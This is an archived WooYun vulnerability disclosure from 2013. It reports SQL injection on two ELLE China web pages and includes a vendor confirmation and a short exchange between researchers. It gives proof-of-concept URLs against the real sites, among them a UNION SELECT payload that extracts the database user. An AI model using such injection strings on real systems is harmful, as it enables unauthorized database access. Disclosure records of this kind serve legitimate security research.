当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025481

漏洞标题:ELLE中国各种SQL注射姿势

相关厂商:ellechina.com

漏洞作者: x1aoh4i

提交时间:2013-06-08 21:33

修复时间:2013-07-23 21:34

公开时间:2013-07-23 21:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-08: 细节已通知厂商并且等待厂商处理中
2013-06-12: 厂商已经确认,细节仅向厂商公开
2013-06-22: 细节向核心白帽子及相关领域专家公开
2013-07-02: 细节向普通白帽子公开
2013-07-12: 细节向实习白帽子公开
2013-07-23: 细节向公众公开

简要描述:

ELLE中国各种SQL注射姿势

详细说明:

分别为一个子站 一个主站 一个aspx 一个php就这些了 看一下吧
http://www.ellechina.com/esa2011/interact_player.php?id=47+and+1=2+union+select+1,user(),3,4,5,6,7&type=4

3.png


http://subscribe.ellechina.com/websubscribe/deco_info_new.aspx?code=ED203’

4.png


就这样吧 第一个我不知道是不是那个哥们提交了 就先这样 这不是还有第二个嘛

漏洞证明:

4.png


因为我要继续挖点 所以节省时间

修复方案:

自己看吧

版权声明:转载请注明来源 x1aoh4i@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-06-12 01:00

厂商回复:

感谢!!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-06-08 22:53 | →Hack涛 ( 普通白帽子 | Rank:158 漏洞数:55 | 好好学习,天天向上!)

    你晚了一步!呵呵

  2. 2013-06-08 23:08 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    @→Hack涛 呵呵 你说的哪个地方晚了一步 难道你说了好多注入点?

  3. 2013-06-08 23:15 | →Hack涛 ( 普通白帽子 | Rank:158 漏洞数:55 | 好好学习,天天向上!)

    @x1aoh4i 我先比你发出来啊!

  4. 2013-06-08 23:16 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    @→Hack涛 老夫肾是不解,你看到我发的什么了?你就确定是同种注入????

  5. 2013-06-09 15:08 | →Hack涛 ( 普通白帽子 | Rank:158 漏洞数:55 | 好好学习,天天向上!)

    @x1aoh4i 应该差不多把

  6. 2013-06-09 15:21 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    @→Hack涛 恩恩 算啦 不审核了